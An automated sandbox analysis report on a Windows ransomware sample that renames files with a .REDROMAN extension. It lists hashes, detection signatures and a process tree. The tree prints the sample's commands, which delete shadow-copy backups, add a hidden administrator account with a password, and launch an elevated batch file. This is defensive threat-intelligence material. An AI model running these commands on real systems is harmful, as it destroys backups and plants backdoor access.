Resubmissions
19-11-2020 14:39
201119-59epbrqadx 1019-11-2020 14:22
201119-ff99dc42e6 1019-11-2020 14:16
201119-298y5e8ncj 9Analysis
-
max time kernel
135s -
max time network
137s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
19-11-2020 14:16
Static task
static1
Behavioral task
behavioral1
Sample
f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe
Resource
win10v20201028
General
-
Target
f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe
-
Size
1.8MB
-
MD5
10d7151b9ee53b8da8ee6f85001ffb20
-
SHA1
76d33ef58ea7b012342d975d871db64840da9675
-
SHA256
f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093
-
SHA512
1c6d2d7f509b462b5d48db61817ee42a7204d10141c59394eb190d0dba733b831a6344bb85197dfac358939379e640c9f38732d376e28f92e187806ca574d10f
Malware Config
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies extensions of user files 3 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exedescription ioc process File created C:\Users\Admin\Pictures\UseInstall.tif.REDROMAN f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe File opened for modification C:\Users\Admin\Pictures\BlockSave.tiff f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe File created C:\Users\Admin\Pictures\BlockSave.tiff.REDROMAN f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe -
Drops startup file 1 IoCs
Processes:
f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OPENTHIS.html f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe -
Modifies service 2 TTPs 5 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe -
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exepid process 1168 vssadmin.exe 2516 vssadmin.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid process 1492 powershell.exe 580 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1492 powershell.exe Token: SeDebugPrivilege 580 powershell.exe Token: SeBackupPrivilege 2392 vssvc.exe Token: SeRestorePrivilege 2392 vssvc.exe Token: SeAuditPrivilege 2392 vssvc.exe -
Suspicious use of WriteProcessMemory 27 IoCs
Processes:
f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exepowershell.execmd.exenet.exenet.exedescription pid process target process PID 756 wrote to memory of 1492 756 f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe powershell.exe PID 756 wrote to memory of 1492 756 f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe powershell.exe PID 756 wrote to memory of 1492 756 f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe powershell.exe PID 756 wrote to memory of 580 756 f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe powershell.exe PID 756 wrote to memory of 580 756 f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe powershell.exe PID 756 wrote to memory of 580 756 f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe powershell.exe PID 580 wrote to memory of 768 580 powershell.exe cmd.exe PID 580 wrote to memory of 768 580 powershell.exe cmd.exe PID 580 wrote to memory of 768 580 powershell.exe cmd.exe PID 768 wrote to memory of 1168 768 cmd.exe vssadmin.exe PID 768 wrote to memory of 1168 768 cmd.exe vssadmin.exe PID 768 wrote to memory of 1168 768 cmd.exe vssadmin.exe PID 768 wrote to memory of 2516 768 cmd.exe vssadmin.exe PID 768 wrote to memory of 2516 768 cmd.exe vssadmin.exe PID 768 wrote to memory of 2516 768 cmd.exe vssadmin.exe PID 768 wrote to memory of 2548 768 cmd.exe net.exe PID 768 wrote to memory of 2548 768 cmd.exe net.exe PID 768 wrote to memory of 2548 768 cmd.exe net.exe PID 2548 wrote to memory of 2560 2548 net.exe net1.exe PID 2548 wrote to memory of 2560 2548 net.exe net1.exe PID 2548 wrote to memory of 2560 2548 net.exe net1.exe PID 768 wrote to memory of 2588 768 cmd.exe net.exe PID 768 wrote to memory of 2588 768 cmd.exe net.exe PID 768 wrote to memory of 2588 768 cmd.exe net.exe PID 2588 wrote to memory of 2600 2588 net.exe net1.exe PID 2588 wrote to memory of 2600 2588 net.exe net1.exe PID 2588 wrote to memory of 2600 2588 net.exe net1.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe"C:\Users\Admin\AppData\Local\Temp\f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe"1⤵
- Modifies extensions of user files
- Drops startup file
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -WindowStyle Hidden get-wmiobject win32_computersystem | "fl model"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Start-Process C:\ProgramData\amdkey.bat -Verb runas2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\amdkey.bat"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet4⤵
- Interacts with shadow copies
-
C:\Windows\system32\vssadmin.exevssadmin.exe Resize ShadowStorage /For=C: /On=C: /MaxSize=320MB4⤵
- Interacts with shadow copies
-
C:\Windows\system32\net.exenet user /add RedROMAN p4zzaub71h4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user /add RedROMAN p4zzaub71h5⤵
-
C:\Windows\system32\net.exenet localgroup administrators RedROMAN /add4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators RedROMAN /add5⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\amdkey.batMD5
e1ccfa2c9fccc3306d6a2beafee97e88
SHA1769a6f5692364611fb1c97b7f8909e305df46b0c
SHA2568c6a13f418d0c11640ea15a0c42a4edc9f4175c4c924573c35b86929a7d25aaf
SHA512f5ecf42ded57faa60cd98f7e43438c7b7158afb7061b836805469840880ae6b980dfe99f66bce8b52f2fa27eb0d07a48631da8f8fb82a3f12754a2024d70460c
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
a04b904ec4a4fd5c196bc393d6909e61
SHA15f9caea37f8f29f80e3840bcdc2bca718da1dfa0
SHA2561b860670ed085ad5181b2d54e06b4540130c6ae50d12e2caa0eeb5f93404732a
SHA512d2fa346c81c036a83aeb26aad639e0b4ff396421f968e0a3fe82bdc293214946c28b71a817f9c888ac01e1d5431d8e0c1f371272489228e5d4c50282716c75c0
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
9f4fb4e2047da217377c0ad64ef5b008
SHA12ecec5eedcec1a1a6b065e33a8260bb5cf6116a0
SHA25636fc811b999c5b690cd9bf4ebdbd39c984a94136dd0aa5746a3edaf2c7c50923
SHA512d66ccd4a90e6b509cbe5379a28f098d2cf2f05ab3de3b90321e956a1080c470f852cdf5f8181a494e34bba5f22b61529bc8915d6017a528ad56b9afeefdef6d4
-
memory/580-12-0x0000000002280000-0x0000000002281000-memory.dmpFilesize
4KB
-
memory/580-14-0x0000000002440000-0x0000000002441000-memory.dmpFilesize
4KB
-
memory/580-17-0x000000001BC40000-0x000000001BC41000-memory.dmpFilesize
4KB
-
memory/580-15-0x0000000002510000-0x0000000002511000-memory.dmpFilesize
4KB
-
memory/580-13-0x000000001AE40000-0x000000001AE41000-memory.dmpFilesize
4KB
-
memory/580-11-0x000007FEF5F30000-0x000007FEF691C000-memory.dmpFilesize
9.9MB
-
memory/580-9-0x0000000000000000-mapping.dmp
-
memory/756-0-0x000000013F8A0000-0x000000013FA71000-memory.dmpFilesize
1.8MB
-
memory/768-19-0x0000000000000000-mapping.dmp
-
memory/1168-20-0x0000000000000000-mapping.dmp
-
memory/1492-1-0x0000000000000000-mapping.dmp
-
memory/1492-4-0x000000001AC60000-0x000000001AC61000-memory.dmpFilesize
4KB
-
memory/1492-6-0x00000000027B0000-0x00000000027B1000-memory.dmpFilesize
4KB
-
memory/1492-2-0x000007FEF5FA0000-0x000007FEF698C000-memory.dmpFilesize
9.9MB
-
memory/1492-5-0x00000000024A0000-0x00000000024A1000-memory.dmpFilesize
4KB
-
memory/1492-3-0x0000000002270000-0x0000000002271000-memory.dmpFilesize
4KB
-
memory/1492-7-0x000000001B6C0000-0x000000001B6C1000-memory.dmpFilesize
4KB
-
memory/1492-8-0x000000001C4F0000-0x000000001C4F1000-memory.dmpFilesize
4KB
-
memory/2516-21-0x0000000000000000-mapping.dmp
-
memory/2548-22-0x0000000000000000-mapping.dmp
-
memory/2560-23-0x0000000000000000-mapping.dmp
-
memory/2588-24-0x0000000000000000-mapping.dmp
-
memory/2600-25-0x0000000000000000-mapping.dmp